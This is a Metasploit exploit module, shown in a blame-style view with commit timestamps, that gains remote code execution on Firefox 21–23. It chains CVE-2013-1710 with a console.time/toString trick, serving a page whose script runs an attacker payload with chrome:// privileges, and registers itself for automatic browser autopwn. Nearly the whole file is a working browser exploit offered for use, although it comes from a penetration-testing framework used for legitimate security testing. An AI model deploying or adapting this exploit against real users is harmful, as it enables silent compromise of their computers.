2014-08-15 20:08:10 +00:00
|
|
|
##
|
|
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::BrowserExploitServer
|
2014-08-15 21:28:21 +00:00
|
|
|
include Msf::Exploit::Remote::BrowserAutopwn
|
2014-08-15 20:08:10 +00:00
|
|
|
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
|
|
|
|
|
|
2014-08-15 21:28:21 +00:00
|
|
|
autopwn_info({
|
|
|
|
|
:ua_name => HttpClients::FF,
|
2014-08-15 21:32:06 +00:00
|
|
|
:ua_minver => "21.0",
|
|
|
|
|
:ua_maxver => "23.0",
|
2014-08-15 21:28:21 +00:00
|
|
|
:javascript => true,
|
2014-08-15 21:32:06 +00:00
|
|
|
:rank => ExcellentRanking
|
2014-08-15 21:28:21 +00:00
|
|
|
})
|
|
|
|
|
|
2014-08-15 20:08:10 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
|
super(update_info(info,
|
2014-08-15 21:28:21 +00:00
|
|
|
'Name' => 'Firefox toString console.time Privileged Javascript Injection',
|
2014-08-15 20:08:10 +00:00
|
|
|
'Description' => %q{
|
|
|
|
|
This exploit gains remote code execution on Firefox 21-23 by abusing two separate
|
|
|
|
|
Javascript-related vulnerabilities to ultimately inject malicious Javascript code
|
|
|
|
|
into a context running with chrome:// privileges.
|
|
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' => [
|
|
|
|
|
'moz_bug_r_a4', # discovered CVE-2013-1710
|
|
|
|
|
'joev' # metasploit module
|
|
|
|
|
],
|
|
|
|
|
'DisclosureDate' => "Aug 6 2013",
|
|
|
|
|
'References' => [
|
2014-08-15 20:09:45 +00:00
|
|
|
['CVE', '2013-1710'] # bypass Chrome Object Wrapper to talk to chrome://
|
2014-08-15 20:08:10 +00:00
|
|
|
],
|
|
|
|
|
'Targets' => [
|
|
|
|
|
[
|
|
|
|
|
'Universal (Javascript XPCOM Shell)', {
|
|
|
|
|
'Platform' => 'firefox',
|
|
|
|
|
'Arch' => ARCH_FIREFOX
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
[
|
|
|
|
|
'Native Payload', {
|
|
|
|
|
'Platform' => %w{ java linux osx solaris win },
|
|
|
|
|
'Arch' => ARCH_ALL
|
|
|
|
|
}
|
|
|
|
|
]
|
|
|
|
|
],
|
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
|
'BrowserRequirements' => {
|
|
|
|
|
:source => 'script',
|
|
|
|
|
:ua_name => HttpClients::FF,
|
|
|
|
|
:ua_ver => lambda { |ver| ver.to_i.between?(21, 23) }
|
|
|
|
|
}
|
|
|
|
|
))
|
|
|
|
|
|
|
|
|
|
register_options([
|
2014-08-15 21:02:26 +00:00
|
|
|
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
|
2014-08-15 20:08:10 +00:00
|
|
|
], self.class)
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def on_request_exploit(cli, request, target_info)
|
|
|
|
|
send_response_html(cli, generate_html(target_info))
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def generate_html(target_info)
|
|
|
|
|
opts = {
|
|
|
|
|
:payload => run_payload # defined in FirefoxPrivilegeEscalation mixin
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
%Q|
|
|
|
|
|
<!doctype html>
|
|
|
|
|
<html>
|
|
|
|
|
<body>
|
|
|
|
|
<script>
|
|
|
|
|
var opts = #{JSON.unparse(opts)};
|
|
|
|
|
var y = {};
|
|
|
|
|
y.constructor.prototype.toString=function() {
|
|
|
|
|
if (window.q) return;
|
|
|
|
|
window.q = true;
|
|
|
|
|
crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, opts.payload, 1024, null, "rsa-ex");
|
|
|
|
|
return 5;
|
|
|
|
|
};
|
2014-08-15 21:02:26 +00:00
|
|
|
console.time(y);
|
2014-08-15 20:08:10 +00:00
|
|
|
</script>
|
|
|
|
|
#{datastore['CONTENT']}
|
|
|
|
|
</body>
|
|
|
|
|
</html>
|
|
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
